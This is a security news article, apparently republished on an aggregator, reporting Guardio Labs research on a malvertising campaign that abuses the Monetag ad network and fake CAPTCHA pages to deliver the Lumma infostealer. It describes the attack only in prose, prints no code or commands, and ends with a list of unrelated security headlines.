Categories: HelpnetSecurity

Malvertising on steroids serves Lumma infostealer


A large-scale malvertising campaign distributing the Lumma infostealer malware via intrusive “ads” leading to fake CAPTCHA pages has been tied by researchers to a threat actor abusing the Monetag ad network.

The campaign from the users’ perspective

Internet users usually land on one of the many thousands SEO-optimized sites using Monetag ad-zone scripts after searching for things like streaming videos, anime, sports, academic documents, etc.

The scripts pop open a new tab, which redirects users to a fake CAPTCHA page that instructs them to verify that they are human by pressing a set of buttons in a specific order.

These actions make it so that the victim pastes a PowerShell script into a Run dialog box and unknowingly executes it by pressing the OK button.

“The malicious pages are frequently updated with new variants to evade detection. Those use different PowerShell one-liners, different script obfuscation to copy the PowerShell script to the clipboard, as well as changes in visual design,” Guardio Labs researchers discovered.

The PowerShell scripts download and execute the powerful Lumma infostealer, just like in these previously flagged campaigns (that may or may not be just one of the stages of this one documented by Guardio).

The campaign from the researchers’ perspective

“In collaboration with Infoblox and through meticulous deobfuscation of JavaScript snippets responsible for triggering ad events, we identified the ad network service responsible—Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus,” Guardio Labs researchers shared.

The ad network is being leveraged by a threat actor – previously dubbed “Vane Viper” by Infoblox researchers – to distribute malware at a large scale.

The threat actor is using obfuscated scripts, redirect chains, and ad-tracking services like BeMob to conceal their malicious pages and intent from the ad network’s moderators.

The malvertising attack flow (Source: Guardio Labs)

“Over just the past ten days, our analysis estimated up to 1M ‘ad impressions’ per day, arriving from around 3000+ publisher sites,” the researchers pointed out.

A concentrated effort is needed to protect internet users

The researchers have outlined the flawed ecosystem and buck passing strategy that makes campaigns such as these possible:

  • Ad networks use ad scripts that essentially “hijack” sites, invasive pop-ups, obfuscated scripts to circumvent ad blockers, direct links that can be posted on social media or in instant messages, etc., and claim they cannot moderate the “ads” because of cloaking
  • Publishers of SEO-optimized (cloned) sites with click-baity content – based on ready-to-deploy website templates or created with the help of specialized services (“Streaming As A Service”) – say they are just monetizing their websites via third-party services
  • Hosting services are failing to promptly identify and take down malicious pages hosted on their infrastructure
  • Ad-tracking services saying they are just an analytics tool and cannot be responsible for the malicious ads.

“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs says.

“Ad networks must prioritize ongoing content moderation, robust account validation to prevent fake registrations, and more accessible reporting mechanisms for the cybersecurity community. Waiting for external reports to address such abuses is not enough. These systems require continuous oversight to protect not just their clients but all internet users.”




Source link

Cybernoz

Share
Published by
Cybernoz

Recent Posts

Hackers Exploiting Azure Key Vault Access Policies To Read Sensitive Data

A critical security configuration in Azure Key Vault has been discovered, potentially allowing users with… Read More

8 minutes ago

BADBOX Botnet Hacked 74,000 Android Devices With Customizable Remote Codes

BADBOX is a cybercriminal operation infecting Android devices like TV boxes and smartphones with malware… Read More

18 minutes ago

Google Calendar Phishing Scam Targets Users with Malicious Invites

KEY SUMMARY POINTS Google Calendar Targeted: Hackers are exploiting Google Calendar’s features to send phishing… Read More

21 minutes ago

Exposing ‘Anom” – Inside The FBI’s Secret Encrypted Phone Company

Joseph Cox, author of the 2024 book “Dark Wire: The Incredible True Story of the… Read More

24 minutes ago

Juniper Warns of Mirai Botnet Targeting SSR Devices with Default Passwords

Dec 19, 2024Ravie LakshmananMalware / Botnet Juniper Networks is warning that Session Smart Router (SSR)… Read More

26 minutes ago

Juniper Warns of Mirai Botnet Targeting SSR Devices with Default Passwords

Dec 19, 2024Ravie LakshmananMalware / Botnet Juniper Networks is warning that Session Smart Router (SSR)… Read More

26 minutes ago